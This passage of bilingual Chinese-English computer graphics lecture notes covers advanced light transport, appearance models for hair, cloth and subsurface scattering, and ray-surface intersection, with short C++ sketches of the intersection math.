      • 典型的有偏方法包括光子映射(Photon Mapping)、顶点连接与合并(Vertex Connection and Merging, VCM)和即时辐射度(Instant Radiosity)等。
      • 优点:通常比无偏方法更快速,尤其适用于实时渲染和交互式应用。
      • 缺点:可能会引入一定程度的图像噪声或伪影,因为近似方法可能无法完全准确地模拟真实世界中的光传输。

    ​ 总的来说,无偏光线传输方法追求最高的图像质量和真实性,但计算成本较高;而有偏光线传输方法则更注重在合理的计算复杂度下获得可接受的图像质量,适用于实时或大规模渲染场景。在实际应用中,通常会根据具体需求和性能要求选择适当的光线传输方法。

    • Unbiased light transport methods

      无偏光传输方法

      • Bidirectional path tracing (BDPT)

        双向路径追踪 (BDPT)

      • Metropolis light transport (MLT)

        Metropolis 光传输 (MLT)

    • Biased light transport methods

      偏光传输方法

      • Photon mapping

        光子映射

      • Vertex connection and merging (VCM)

        顶点连接和合并 (VCM)

      • Instant radiosity (VPL / many light methods)

        即时辐射度 (VPL / 多种光方法)


    Biased vs. Unbiased Monte Carlo Estimators

    • An unbiased Monte Carlo technique does not have any systematic error

      无偏蒙特卡罗技术没有任何系统误差

      • The expected value of an unbiased estimator will always be the correct value, no matter how many samples are used

        无论使用多少样本,无偏估计量的预期值始终是正确的值

    • Otherwise, biased

      否则,有偏差

      • One special case, the expected value converges to the correct value as infinite #samples are used — consistent

        一种特殊情况:随着样本数趋于无穷,期望值会收敛到正确值,这称为一致(consistent)

    • We’ll look again at this page after introducing Photon Mapping

      在介绍光子映射后,我们将再次查看此页面


    Bidirectional Path Tracing (BDPT)

    • Recall: a path connects the camera and the light

      回想一下:一条路径连接着相机和灯光

    • BDPT

      • Traces sub-paths from both the camera and the light

        追踪来自相机和灯光的子路径

      • Connects the end points from both sub-paths

        连接两个子路径的端点

    png

    ​BDPT 的基本思想是同时追踪从光源到摄像机的路径和从摄像机到场景中物体的路径,然后在这些路径上进行连接,以计算从光源到摄像机的光照传输。这种双向追踪方式为模拟复杂光照效果提供了更多的可能性。

    1. 从摄像机追踪路径
      • 从摄像机发射光线,追踪它们在场景中的路径。这种方法类似于传统路径追踪。
    2. 从光源追踪路径
      • 同时,从光源开始发射光线,追踪它们在场景中的传播。这种方法类似于光子映射等技术。
    3. 路径连接
      • 关键步骤是在摄像机路径和光源路径之间进行连接,形成一系列完整的路径。这些连接点的交汇位置和路径长短可以用来计算光照传输。

    png

    ​这是一个光路复杂的场景,主要光照都来自灯打到天花板后反射出来的光。

    • Suitable if the light transport is complex on the light’s side

      适用于光源一侧光传输比较复杂的场景

    • Difficult to implement & quite slow

      难以实现且速度较慢


    Metropolis Light Transport (MLT)

    png

    ​MLT 基于马尔可夫链蒙特卡洛算法 (Markov Chain Monte Carlo, MCMC)。它通过在渲染过程中构建一系列状态(或称为路径)并使用概率转移来搜索光线路径空间,以寻找高质量的渲染解决方案。

    1. 状态空间构建
      • MLT 从初始状态(或路径)开始,通过一系列随机变化逐步构建状态空间。这些状态描述了光线在场景中的传播路径,包括从光源到摄像机的直接和间接光照。
    2. 概率转移
      • MLT 使用概率转移算法来在状态空间中搜索,以决定接受或拒绝新状态。这个过程涉及到一系列基于状态之间差异的概率计算,以及利用接受率来平衡探索和收敛性能。
    3. 样本累积
      • MLT 通过对多个状态进行采样并根据它们的贡献权重来累积样本,以生成最终的渲染图像。这样的采样过程能够有效地降低图像中的噪声,并提高渲染的质量。
    • A Markov Chain Monte Carlo (MCMC) application

      马尔可夫链蒙特卡罗 (MCMC) 应用

      • Jumping from the current sample to the next with some PDF

        使用一些 PDF 从当前样本跳转到下一个样本

    • Very good at locally exploring difficult light paths

      非常擅长局部探索困难的光路

    • Key idea

      关键思想

      • Locally perturb an existing path to get a new path

        局部扰动现有路径以获得新路径


    png

    优点:

    • Works great with difficult light paths

      适用于困难的光路

    • Also unbiased

      也无偏差


    png

    缺点:

    • Difficult to estimate the convergence rate

      难以估计收敛速度

    • Does not guarantee equal convergence rate per pixel

      不能保证每个像素的收敛速度相等

    • So, usually produces “dirty” results

      因此,通常会产生“脏”结果

    • Therefore, usually not used to render animations

      因此,通常不用于渲染动画


    Photon Mapping

    ​光子映射

    png

    • A biased approach & A two-stage method

      一种有偏的方法,同时是一个两阶段的方法

    • Very good at handling Specular-Diffuse-Specular (SDS) paths and generating caustics

      非常擅长处理镜面反射-漫反射-镜面反射 (SDS) 路径和生成焦散


    Photon Mapping — Approach (variations apply)

    ​光子映射——方法(适用变化)

    ​Photon Mapping 主要分为两个阶段:光子发射和光子映射。

    1. 光子发射
      • 在这个阶段,光子从光源发射,并在场景中传播。这些光子以一定的概率与场景中的表面相交,并根据相交点的性质,如表面颜色、材质等,进行反射、折射或吸收。
    2. 光子映射
      • 在这个阶段,光子被映射到场景的光线路径上,并存储在特定的数据结构中,如光子图(photon map)。这个数据结构可以是基于光子碰撞点的空间分布,也可以是基于光子的能量和颜色等属性。
    3. 渲染
      • 在渲染阶段,相机射线从观察点出发,与场景中的表面相交。当相机射线与场景中的表面相交时,就可以使用光子图来估计光线的颜色和强度,从而计算出最终的图像颜色。

    png

    • Stage 1 — photon tracing

      第 1 阶段 — 光子追踪

      • Emitting photons from the light source, bouncing them around, then recording photons on diffuse surfaces

        从光源发射光子,使其四处反射,然后在漫反射表面上记录光子

    • Stage 2 — photon collection (final gathering)

      第 2 阶段 — 光子收集(最终聚集)

      • Shoot sub-paths from the camera, bouncing them around, until they hit diffuse surfaces

        从相机中发射子路径,让它们四处弹跳,直到它们击中漫反射表面


    Photon Mapping

    png

    • Calculation — local density estimation

      计算 — 局部密度估计

      • Idea: areas with more photons should be brighter

        想法:光子较多的区域应该更亮

      • For each shading point, find the nearest N photons. Take the surface area they cover

        对于每个着色点,找到最近的 N 个光子,取它们所覆盖的表面积
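
    ​下面是这种局部密度估计的一个最小 C++ 草图,假设最近的 N 个光子已经查询完毕(`Photon` 结构仅为示意):把这些光子的通量乘以 BRDF 后求和,再除以它们覆盖的圆盘面积 $\pi r^2$。

    ```cpp
    #include <vector>

    const double PI = 3.14159265358979323846;

    struct Photon {      // 示意的光子记录
        double flux;     // 该光子携带的功率(通量)
        double brdf;     // 对该光子入射方向与观察方向求得的 f_r
    };

    // 用最近的 N 个光子做局部密度估计:
    // L ≈ Σ f_r * ΔΦ / (π r^2),r 为包住这 N 个光子的圆盘半径。
    double estimateRadiance(const std::vector<Photon>& nearest, double r) {
        double sum = 0.0;
        for (const Photon& p : nearest) sum += p.brdf * p.flux;
        return sum / (PI * r * r);   // 除以这些光子覆盖的面积 ΔA
    }
    ```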


    png

    • Why biased?

      为什么有偏差?

    • Local Density estimation $\text dN / \text dA \ne \Delta N / \Delta A$

      局部密度估计 $\text dN / \text dA \ne \Delta N / \Delta A$

    • But in the sense of limit

      但在极限意义上

      • More photons emitted ->

        发射更多光子 ->

      • the same $N$ photons covers a smaller $\Delta A$ ->

        相同的 $N$ 个光子覆盖较小的 $\Delta A$ ->

      • $\Delta A$ is closer to $\text dA$

        $\Delta A$ 更接近 $\text dA$

    • So, biased but consistent!

      因此,有偏差但一致!

    • An easier understanding bias in rendering

      更容易理解渲染中的偏差

      • Biased == blurry

        偏差 == 模糊

      • Consistent == not blurry with infinite #samples

        一致 == 无限 #samples 不模糊

    • Why not do a “const range” search for density estimation?

      为什么不进行“常量范围”搜索以进行密度估计?


    Vertex Connection and Merging

    ​顶点连接与合并

    png

    • A combination of BDPT and Photon Mapping

      BDPT 和光子映射的结合

    • Key idea

      关键思想

      • Let’s not waste the sub-paths in BDPT if their end points cannot be connected but can be merged

        如果 BDPT 中的子路径的端点无法连接但可以合并,那么就不要浪费它们

      • Use photon mapping to handle the merging of nearby “photons”

        使用光子映射来处理附近“光子”的合并


    Instant Radiosity (IR)

    ​即时辐射 (IR)

    png

    • Sometimes also called many-light approaches

      有时也称为多光方法

    • Key idea

      核心思想

      • Lit surfaces can be treated as light sources

        光照表面可视为光源

    • Approach

      方法

      • Shoot light sub-paths and assume the end point of each sub-path is a Virtual Point Light (VPL)

        发射光线子路径,并将每个子路径的终点视为一个虚拟点光源 (VPL)

      • Render the scene as usual using these VPLs

        使用这些 VPL 照常渲染场景

    png

    ​右图中,由于除以了一个极小的浮点数,导致边缘极亮。

    • Pros: fast and usually gives good results on diffuse scenes

      优点:速度快,通常在漫反射场景中效果良好

    • Cons:

      缺点

      • Spikes will emerge when VPLs are close to shading points

        当 VPL 靠近着色点时会出现尖峰

      • Cannot handle glossy materials

        无法处理光泽材质

    Advanced Appearance Modeling

    ​非表面模型是描述物体内部结构或几何形状的模型,不仅包括物体的外部表面,还包括内部的结构或体积。

    • Non-surface models

      非表面模型

      • Participating media

        参与介质

      • Hair / fur / fiber (BCSDF)

        头发/毛皮/纤维 (BCSDF)

      • Granular material

        颗粒材料

    ​表面模型是描述物体外部表面的模型,通常由一系列的表面片段或曲面组成。

    • Surface models

      表面模型

      • Translucent material (BSSRDF)

        半透明材料 (BSSRDF)

      • Cloth

        布料

      • Detailed material (non-statistical BRDF)

        详细材料 (非统计 BRDF)

    • Procedural appearance

      程序外观

    Non-Surface Models

    ​非表面模型


    Participating Media

    ​参与介质

    png

    ​非表面模型范例:Fog 和 Cloud。

    png

    • At any point as light travels through a participating medium, it can be (partially) absorbed and scattered.

      光在穿过参与介质的任何时刻都会被(部分)吸收和散射。

    png

    • Use Phase Function to describe the angular distribution of light scattering at any point $x$ within participating media.

      使用相位函数描述参与介质中任意点 $x$ 的光散射的角度分布。


    Participating Media: Rendering

    png

    • Randomly choose a direction to bounce

      随机选择一个方向进行反弹

    • Randomly choose a distance to go straight

      随机选择一个距离进行直线运动

    • At each ‘shading point’, connect to the light

      在每个“着色点”处,连接到光源


    Participating Media: Application

    png


    Hair Appearance

    ​毛发材质

    png


    Kajiya-Kay Model

    ​Kajiya-Kay 模型是一种经典的毛发着色模型,由 Jim Kajiya 和 Tim Kay 于 1989 年提出,用于渲染头发、毛皮等细长纤维的高光与漫反射。

    Kajiya-Kay 模型的基本原理:

    ​模型把每根头发近似为一根细圆柱体:着色不再依赖表面法线,而是依赖发丝的切线方向。漫反射项与光线方向和切线夹角的正弦成正比;高光项围绕切线方向展开,形成沿发丝拉长的各向异性高光。

    Kajiya-Kay 模型的主要特点:

    1. 基于切线的着色:用发丝切线代替表面法线来计算漫反射与镜面反射,适合细长纤维。
    2. 经验模型:可以看作 Phong 模型向各向异性纤维的推广,而不是基于物理的纤维散射模型。
    3. 局部光照:只考虑直接光照,不模拟光在纤维内部的折射与多次散射(这正是后来 Marschner 模型改进的方向)。

    png

    png

    ​使用 Kajiya-Kay Model 渲染头发的效果图。


    Marschner Model

    ​Marschner 模型是一种用于模拟人类头发或其他细长纤维的光照行为的计算机图形学模型。它由 Steve Marschner 等人在 2003 年提出,是一种基于物理的模型,旨在更准确地描述头发等细长纤维的外观。

    Marschner 模型的基本原理:

    ​Marschner 模型基于头发纤维的微观结构和光的物理性质,考虑了头发内部的散射、吸收和折射等光学效应,以及表面的漫反射、镜面反射和透射等效应。

    Marschner 模型的主要特点:

    1. 玻璃状圆柱模型:把头发纤维近似为带倾斜鳞片(角质层)的玻璃状圆柱,内部皮质含色素、会吸收光线。
    2. 多路径光学效应:追踪纤维内的三类主要光路,即直接反射 (R)、两次透射 (TT)、内部反射后再射出 (TRT),并把散射函数分解为纵向与方位两个分量。
    3. 有色且偏移的高光:角质层鳞片使高光沿发丝方向偏移;TT/TRT 路径因皮质吸收而带上头发本身的颜色,形成白色主高光与有色次高光并存的效果。

    png

    png

    • Glass-like cylinder

      玻璃状圆柱体

    png

    • 3 types of light interactions: R, TT, TRT

      3 种光相互作用:R、TT、TRT

      (R: reflection, T: transmission)

    (R:反射,T:透射)

    png


    Hair Appearance Model: Application

    png


    Fur Appearance — As Human Hair

    ​毛皮外观——作为人类头发

    • Cannot represent diffusive and saturated appearance

      无法呈现弥散和饱和的外观(用人类头发模型来描述动物毛发效果并不真实)

    png


    Human Hair vs Animal Fur

    png

    ​人类毛发结构与动物毛发结构不太一样。

    • Common for hair/fur fibers

      常见于毛发/毛皮纤维

      • Cuticle

        角质层

        • Covered with scales

          覆盖有鳞片

      • Medulla

        髓质

        • Complex structure

          结构复杂

        • Scatters light

          散射光线

      • Cortex

        皮质

        • Contains pigments

          含有色素

        • Absorbs light

          吸收光线


    Importance of Medulla

    ​髓质层的重要性(髓质会散射光线,使毛发呈现更漫射、更饱和的外观)

    png

    png


    Double Cylinder Model

    ​双重圆柱体模型

    png


    Double Cylinder Model — Lobes

    png

    png

    png

    ​这张图渲染一帧要 36.9min。

    png


    Granular Material

    ​颗粒材质

    • What is granular material?

    png

    png

    Can we avoid explicit modeling of all granules?

    ​我们能否避免对所有粒子进行显式建模?

    • Yes with procedural definition.

      是的,通过程序定义。

    png

    Surface Models

    png

    ​接下来处理这种 Translucent Material 半透明的材质。


    Subsurface Scattering

    ​次表面散射

    png

    • Visual characteristics of many surfaces caused by light exiting at different points than it enters

      许多表面的视觉特征,源于光线的射出位置与射入位置不同

      • Violates a fundamental assumption of the BRDF

        违反了 BRDF 的基本假设

    png


    Scattering Functions

    ​散射函数

    • BSSRDF: generalization of BRDF; exitant radiance at one point due to incident differential irradiance at another point:

      BSSRDF:BRDF 的推广;某一点的出射辐射度是由于另一点的入射差分辐照度引起的:

    $$S(x_i,\omega_i,x_o,\omega_o)$$

    • Generalization of rendering equation: integrating over all points on the surface and all directions (!)

      渲染方程的推广:对表面上所有点和所有方向进行积分(!)

    $$L(x_o,\omega_o)=\int_A\int_{H^2}S(x_i,\omega_i,x_o,\omega_o)L_i(x_i,\omega_i)\cos\theta_i\mathrm d\omega_i\mathrm dA$$

    png


    Dipole Approximation [Jensen et al. 2001]

    • Approximate light diffusion by introducing two point sources.

      通过引入两个点源来近似光扩散。

    png

    ​BRDF 与 BSSRDF 效果对比:

    png

    png

    png

    png


    Cloth

    png

    A collection of twisted fibers!

    ​扭曲纤维的集合!

    Two levels of twist

    ​两层扭曲

    • Woven or knitted

      机织或针织

    png


    Cloth: Render as Surface

    png

    • Given the weaving pattern, calculate the overall behavior

      给定编织模式,计算整体行为

    • Render using a BRDF

      使用 BRDF 进行渲染

    png

    Render as Surface — Limitation

    png

    ​这个模型对尼龙好使,对天鹅绒不好使。


    Cloth: Render as Participating Media

    ​将布料作为参与媒介

    png

    • Properties of individual fibers & their distribution -> scattering parameters

      单个纤维的属性及其分布 -> 散射参数

    • Render as a participating medium

      作为参与介质进行渲染


    Cloth: Render as Actual Fibers

    png

    • Render every fiber explicitly!

      显式地渲染每一根纤维!啊!计算量爆炸!


    Cloth: Demo & Application

    png


    Detailed Appearance: Motivation

    ​详细外观:动机

    png

    • Not looking realistic, why?

      看上去并不真实,为什么?表面太完美了,没有划痕,反而不够真实。


    Real world is more complicated

    ​现实世界更加复杂

    png

    png


    Recap: Microfacet BRDF

    ​回顾:微面片 BRDF

    png

    Surface = Specular microfacets + Statistical normals

    表面 = 镜面微表面 + 统计法线

    $$f(\mathbf{i},\mathbf{o})=\frac{\mathbf{F}(\mathbf{i},\mathbf{h})\mathbf{G}(\mathbf{i},\mathbf{o},\mathbf{h})\mathbf{D}(\mathbf{h})}{4(\mathbf{n},\mathbf{i})(\mathbf{n},\mathbf{o})}$$

    • $\mathbf{D}(\mathbf{h})$:

      NDF: Normal Distribution Function

      法线分布函数


    Statistical NDF vs. Actual NDF

    png

    ​将法线变得有锯齿。


    Define details

    png

    ​法线坑坑洼洼的。渲染?太难了!


    Difficult path sampling problem

    ​困难路径采样问题

    png

    ​好多射线都 miss 了,浪费了运算资源。


    Solution: BRDF over a pixel

    ​解决方案:像素上的 BRDF

    png

    Detailed / Glinty Material

    ​细致/闪亮材质

    png


    Recent Trend: Wave Optics

    ​近期趋势:波动光学

    ​光是有波粒二象性的,当光透过极小的空隙后,光就不可视为直线传播,就会产生其它颜色的小光斑。

    png

    png

    Procedural Appearance

    png

    • Can we define details without textures?

      我们可以在不使用纹理的情况下定义细节吗?

      • Yes! Compute a noise function on the fly.

        是的!动态计算噪声函数。(纹理是用函数计算出来的)

      • 3D noise -> internal structure if cut or broken

        3D 噪声 -> 即使切开或破损,内部也有结构(依然可以显示出纹理)

      • Thresholding (noise -> binary noise)

        阈值(噪声 -> 二元噪声)

    资源

    课程

    Lecture 13: Ray Tracing 1 (Whitted-Style Ray Tracing)

    Why Ray Tracing?

    png

    Soft shadows

    ​软阴影

    Glossy reflection

    ​光泽反射

    Indirect illumination

    ​间接照明

    • Rasterization couldn’t handle global effects well

    光栅化无法很好地处理全局效果

    • (Soft) shadows

    (软)阴影

    • And especially when the light bounces more than once

      尤其是当光线反弹不止一次时


    png

    Rasterization is fast, but quality is relatively low

    ​光栅化速度快,但质量相对较低

    ​早期的游戏看上去画质不好,因为这个游戏的地图太大了,为了保证性能只得牺牲画质。


    png

    ​不需要实时渲染的任务下,光线追踪可以渲染出很好的效果。

    • Ray tracing is accurate, but is very slow

      光线追踪很精确,但速度很慢

      • Rasterization: real-time, ray tracing: offline

        光栅化:实时,光线追踪:离线

      • ~10K CPU core hours to render one frame in production

        在生产中渲染一帧图像需要 ~10K CPU 核心小时

    Basic Ray-Tracing Algorithm

    Light Rays

    ​光线

    Three ideas about light rays

    关于光线的三种观点

    1. Light travels in straight lines (though this is wrong)

      光是直线传播的(尽管这是错误的)

    2. Light rays do not “collide” with each other if they cross (though this is still wrong)

      光线交叉时不会相互 “碰撞”(尽管这仍然是错误的)

    3. Light rays travel from the light sources to the eye (but the physics is invariant under path reversal-reciprocity).

      光线从光源到眼睛传播(但物理规律在路径反向-互易性下保持不变)

    “And if you gaze long into an abyss, the abyss also gazes into you.” — Friedrich Wilhelm Nietzsche (translated)

    ​当你在凝视深渊时,深渊也在凝视你。


    Emission Theory of Vision

    ​视觉发射理论。认为人之所以能够看到东西,是因为人眼发出的射线投射到了相应的物体上。虽然这是错误的,但我们可以从中得到启发。

    png

    “For every complex problem there is an answer that is clear, simple, and wrong.” —— H. L. Mencken

    ​每一个复杂的问题都有一个清晰、简单和错误的答案。


    Ray Casting

    ​射线投射

    png

    1. Generate an image by casting one ray per pixel

      通过为每个像素投射一条光线生成图像

    2. Check for shadows by sending a ray to the light

      通过向光源发送光线检查阴影


    Ray Casting - Generating Eye Rays

    ​从眼睛处发出射线

    Pinhole Camera Model

    ​针孔摄像机模型

    png

    ​从眼睛处发射射线,射线第一个打到的物体即为观察到的物体。


    Ray Casting - Shading Pixels (Local Only)

    ​给像素着色

    png

    ​所看到的点与光照方向,物体法线,材质等参数,就可以计算出观察到的像素的颜色。


    Recursive (Whitted-Style) Ray Tracing

    ​递归(怀特式)光线追踪。比之前的光线追踪算法还要高级一点。

    png

    “An improved Illumination model for shaded display” T. Whitted, CACM 1980

    Time:

    • VAX 11/780 (1979) 74m

      当时渲染了 74 分钟。

    • PC (2006) 6s

    • GPU (2012) 1/30s


    png

    ​眼睛发出的射线还会再反射到其他面上。


    png

    ​还有可能产生折射。


    png

    ​这些打到物体上的点再计算光照,如果中间有阻挡,则视为阴影部分。

    Ray-Surface Intersection

    ​射线-表面交点。现在该研究射线在表面上的交点是如何计算的。

    png

    Ray is defined by its origin and a direction vector

    ​射线由其原点 $\mathbf{o}$ 和方向矢量 $\mathbf d$ 定义

    Ray equation:

    png

    ​用射线发出的时间 $t$ 来定义这个射线:

    $$\mathbf{r}(t)=\mathbf{o}+t\mathbf{d},\quad0\leq t<\infty $$


    Ray Intersection With Sphere

    ​射线与球面的交点

    Ray: $\mathbf{r}(t)=\mathbf{o}+t\mathbf{d},\quad 0\leq t<\infty$

    Sphere: $\mathbf p:(\mathbf p-\mathbf c)^2-R^2=0$

    What is an intersection?

    ​什么是交点?

    The intersection $\mathbf p$ must satisfy both ray equation and sphere equation

    ​交点 $\mathbf p$ 必须同时满足射线方程和球面方程,联立两个方程即可。

    png

    Solve for intersection:

    $$(\mathbf{o}+t\mathbf{d}-\mathbf{c})^2-R^2=0$$

    png

    $$\begin{aligned}
    &at^2+bt+c=0,\text{ where} \\
    &a=\mathbf{d}\cdot\mathbf{d} \\
    &b=2(\mathbf{o}-\mathbf{c})\cdot\mathbf{d} \\
    &c=(\mathbf{o}-\mathbf{c})\cdot(\mathbf{o}-\mathbf{c})-R^2 \\
    &t=\frac{-b\pm\sqrt{b^2-4ac}}{2a}
    \end{aligned}$$

    ​就是一元二次方程求解了。
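
    ​对应的求根过程可以写成下面这个最小 C++ 草图(`Vec3` 等类型为示意):

    ```cpp
    #include <cmath>
    #include <optional>

    struct Vec3 {
        double x, y, z;
        Vec3 operator-(const Vec3& v) const { return {x - v.x, y - v.y, z - v.z}; }
    };
    double dot(const Vec3& a, const Vec3& b) { return a.x*b.x + a.y*b.y + a.z*b.z; }

    // 求解 (o + t d - c)^2 - R^2 = 0 中最小的非负 t。
    std::optional<double> intersectSphere(const Vec3& o, const Vec3& d,
                                          const Vec3& c, double R) {
        Vec3 oc = o - c;
        double a  = dot(d, d);
        double b  = 2.0 * dot(oc, d);
        double cc = dot(oc, oc) - R * R;
        double disc = b * b - 4.0 * a * cc;
        if (disc < 0.0) return std::nullopt;            // 无实根:射线未击中
        double t = (-b - std::sqrt(disc)) / (2.0 * a);  // 先取较近的根
        if (t < 0.0) t = (-b + std::sqrt(disc)) / (2.0 * a);
        if (t < 0.0) return std::nullopt;               // 球在射线“后面”
        return t;
    }
    ```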


    Ray Intersection With Implicit Surface

    Ray 射线方程: $\mathbf{r}(t)=\mathbf{o}+t\mathbf{d},\quad 0\leq t<\infty$

    General implicit surface 一般隐式曲面: $\mathbf{p}:f(\mathbf{p})=0$

    Substitute ray equation 将射线方程代入: $f(\mathbf{o}+t\mathbf{d})=0$

    Solve for real, positive roots 求解实数正根:

    png

    ​对于这样的参数方程,对于计算机来说求解很容易!


    Ray Intersection With Triangle Mesh

    ​但是一般都用多边形面来表示一个几何,如何计算?

    png

    Why?

    • Rendering: visibility, shadows, lighting…

      渲染:可见度、阴影、 光照…

    • Geometry: inside/outside test

      几何:内部/外部测试

    How to compute?

    ​如何计算?

    Let’s break this down:

    ​让我们来分析一下:

    • Simple idea: just intersect ray with each triangle

      简单的想法:只需将射线与每个三角形相交即可

    • Simple, but slow (acceleration?)

      简单,但速度慢(加速?)

    • Note: can have 0, 1 intersections (ignoring multiple intersections)

      注意:可以有 0 个、1 个交点 (忽略多个交点)


    Ray Intersection With Triangle

    png

    Triangle is in a plane

    ​三角形位于平面内

    • Ray-plane intersection

      射线与平面相交

    • Test if hit point is inside triangle

      测试命中点是否位于三角形内

    Many ways to optimize…

    ​优化方法有很多…


    Plane Equation

    ​平面方程

    Plane is defined by normal vector and a point on plane

    ​平面由法向量和平面上的一个点定义

    Example:

    png

    Plane Equation (if $p$ satisfies it, then $p$ is on the plane):

    ​平面方程(若 $p$ 满足该方程,则 $p$ 在平面上):

    png


    Ray Intersection With Plane

    Ray equation: $\mathbf{r}(t)=\mathbf{o}+t\mathbf{d},0\leq t<\infty $

    Plane equation: $\mathbf{p}:(\mathbf{p}-\mathbf{p}^{\prime})\cdot\mathbf{N}=0$

    Solve for intersection: 将两个方程联立,求解

    $\text{Set }\mathbf{p}=\mathbf{r}(t)\text{ and solve for }t$

    $\mathbf{(p-p^{\prime})\cdot N=(o+td-p^{\prime})\cdot N=0}$

    $t=\frac{(\mathbf{p}^{\prime}-\mathbf{o})\cdot\mathbf{N}}{\mathbf{d}\cdot\mathbf{N}},\quad\textsf{Check: }0\leq t<\infty$
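
    ​按这个公式,射线与平面求交只需几行代码(沿用上面 ray-sphere 草图里示意的 `Vec3` 与 `dot`,并需要 `<cmath>`):

    ```cpp
    // t = ((p' - o) · N) / (d · N);返回负值表示平行或交点在射线后方。
    double intersectPlane(const Vec3& o, const Vec3& d,
                          const Vec3& pPrime, const Vec3& N) {
        double denom = dot(d, N);
        if (std::fabs(denom) < 1e-9) return -1.0;  // 射线与平面平行
        return dot(pPrime - o, N) / denom;         // 调用方需检查 0 <= t
    }
    ```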


    Möller Trumbore Algorithm

    A faster approach, giving barycentric coordinate directly

    ​一种更快的方法(判断射线是否经过三角形面),直接给出重心坐标

    Recall: How to determine if the “intersection” is inside the triangle?

    ​回想一下:如何确定“交点”是否在三角形内部?

    $$\vec{\mathbf{O}}+t\vec{\mathbf{D}}=(1-b_1-b_2)\vec{\mathbf{P}}_0+b_1\vec{\mathbf{P}}_1+b_2\vec{\mathbf{P}}_2$$

    ​将射线打到平面上的点用三角形的重心坐标来表示。

    Hint: $(1-b_1-b_2), b_1, b_2$ are barycentric coordinates!

    ​提示:$(1-b_1-b_2),b_1,b_2$ 是重心坐标!

    $$\begin{bmatrix}t\\b_1\\b_2\end{bmatrix}=\frac{1}{\vec{\mathbf{S}}_1\bullet\vec{\mathbf{E}}_1}\begin{bmatrix}\vec{\mathbf{S}}_2\bullet\vec{\mathbf{E}}_2\\\vec{\mathbf{S}}_1\bullet\vec{\mathbf{S}}\\\vec{\mathbf{S}}_2\bullet\vec{\mathbf{D}}\end{bmatrix}$$

    其中 $\vec{\mathbf{E}}_1=\vec{\mathbf{P}}_1-\vec{\mathbf{P}}_0$,$\vec{\mathbf{E}}_2=\vec{\mathbf{P}}_2-\vec{\mathbf{P}}_0$,$\vec{\mathbf{S}}=\vec{\mathbf{O}}-\vec{\mathbf{P}}_0$,$\vec{\mathbf{S}}_1=\vec{\mathbf{D}}\times\vec{\mathbf{E}}_2$,$\vec{\mathbf{S}}_2=\vec{\mathbf{S}}\times\vec{\mathbf{E}}_1$

    $\text{Cost}=(1 \text{div}, 27 \text{mul} ,17 \text{add})$

    ​需要 1 次除,27 次乘,17 次加。
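
    ​下面是 Möller-Trumbore 的一个最小 C++ 草图,直接套用上面的公式(沿用前文示意的 `Vec3`/`dot`,补一个叉乘;需要 `<cmath>`):

    ```cpp
    #include <optional>

    Vec3 cross(const Vec3& a, const Vec3& b) {
        return {a.y*b.z - a.z*b.y, a.z*b.x - a.x*b.z, a.x*b.y - a.y*b.x};
    }

    struct Hit { double t, b1, b2; };  // 距离 t 与两个重心坐标

    std::optional<Hit> mollerTrumbore(const Vec3& O, const Vec3& D,
                                      const Vec3& P0, const Vec3& P1,
                                      const Vec3& P2) {
        Vec3 E1 = P1 - P0, E2 = P2 - P0;
        Vec3 S  = O - P0;
        Vec3 S1 = cross(D, E2), S2 = cross(S, E1);
        double denom = dot(S1, E1);
        if (std::fabs(denom) < 1e-9) return std::nullopt; // 退化或平行
        double inv = 1.0 / denom;
        double t  = dot(S2, E2) * inv;
        double b1 = dot(S1, S)  * inv;
        double b2 = dot(S2, D)  * inv;
        // 交点在三角形内:重心坐标均非负,且 t >= 0
        if (t < 0 || b1 < 0 || b2 < 0 || 1 - b1 - b2 < 0) return std::nullopt;
        return Hit{t, b1, b2};
    }
    ```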

    Accelerating Ray-Surface Intersection

    ​加速计算射线-表面交点的方法

    Ray Tracing – Performance Challenges

    Simple ray-scene intersection

    ​简单的光线场景交点

    • Exhaustively test ray-intersection with every triangle

      详尽地测试每个三角形的光线交点

    • Find the closest hit (i.e. minimum $t$)

      找到最接近的命中点(即最小 $t$)

    Problem:

    ​问题:

    • Naive algorithm = #pixels ⨉ #triangles (⨉ #bounces)

      简单算法 = #像素 ⨉ #三角形(⨉ #反射)

    • Very slow!

      非常慢!

    For generality, we use the term objects instead of triangles later (but doesn’t necessarily mean entire objects)

    ​为了通用,后面我们用“对象”一词来代替三角形(但不一定指整个物体)

    png

    png

    ​像这几个超过一千多个面了,要是这么渲染的话性能太差了。

    Bounding Volumes

    png

    Quick way to avoid intersections: bound complex object with a simple volume

    ​避免上面计算相交的快速方法:用简单体积绑定复杂物体

    • Object is fully contained in the volume

      物体完全包含在包围盒中

    • If it doesn’t hit the volume, it doesn’t hit the object

      如果射线没有击中包围盒,它就不会击中物体,就不用后续计算。优化性能

      如果击中了,再老老实实计算吧。

    • So test BVol first, then test object if it hit

      因此,首先测试 BVol,然后测试物体是否击中


    Ray-Intersection With Box

    ​射线与盒子的相交

    Understanding: box is the intersection of 3 pairs of slabs

    ​理解:包围盒是三对平板(slabs)的交集。

    png

    Specifically:

    ​具体来说:

    We often use an Axis-Aligned Bounding Box (AABB)

    ​我们经常使用轴对齐包围盒 (AABB)

    i.e. any side of the BB is along either $x$, $y$, or $z$ axis

    ​即 BB 的任何一侧都沿着 $x$、$y$ 或 $z$ 轴


    Ray Intersection with Axis-Aligned Box

    png

    ​2D 空间中,先计算射线与 $\mathrm x_0$、$\mathrm x_1$ 两个平面的交点,得到一段线段;再与 $\mathrm y_0$、$\mathrm y_1$ 求交,得到另一段线段。两条线段的交集即为射线在包围盒内的范围。

    2D example; 3D is the same! Compute intersections with slabs and take intersection of $t_{min}/t_{max}$ intervals.

    ​2D 示例;3D 也一样!计算与板块的交点并取 $t_{min}/t_{max}$ 间隔的交点

    How do we know when the ray intersects the box?

    ​我们如何知道射线何时与盒子相交?


    • Recall: a box (3D) = three pairs of infinitely large slabs

      回想一下:一个盒子(3D)= 三对无限大的平板

    • Key ideas

      关键思想

      • The ray enters the box only when it enters all pairs of slabs

        只有当射线进入所有平板对时,它才会进入盒子

      • The ray exits the box as long as it exits any pair of slabs

        只要射线离开任何一对平板,它就会离开盒子

    • For each pair, calculate the $t_{\text{min}}$ and $t_\text{max}$ (negative is fine)

      对于每一对,计算 $t_{\text{min}}$ 和 $t_\text{max}$(负数也可以)

    • For the 3D box, $t_{\text{enter}} = \max\{t_{\text{min}}\}$, $t_{\text{exit}} = \min\{t_{\text{max}}\}$

      对于 3D 盒子,$t_{\text{enter}} = \max\{t_{\text{min}}\}$,$t_{\text{exit}} = \min\{t_{\text{max}}\}$

    • If $t_{\text{enter}} < t_{\text{exit}}$, we know the ray stays a while in the box
      (so they must intersect!)

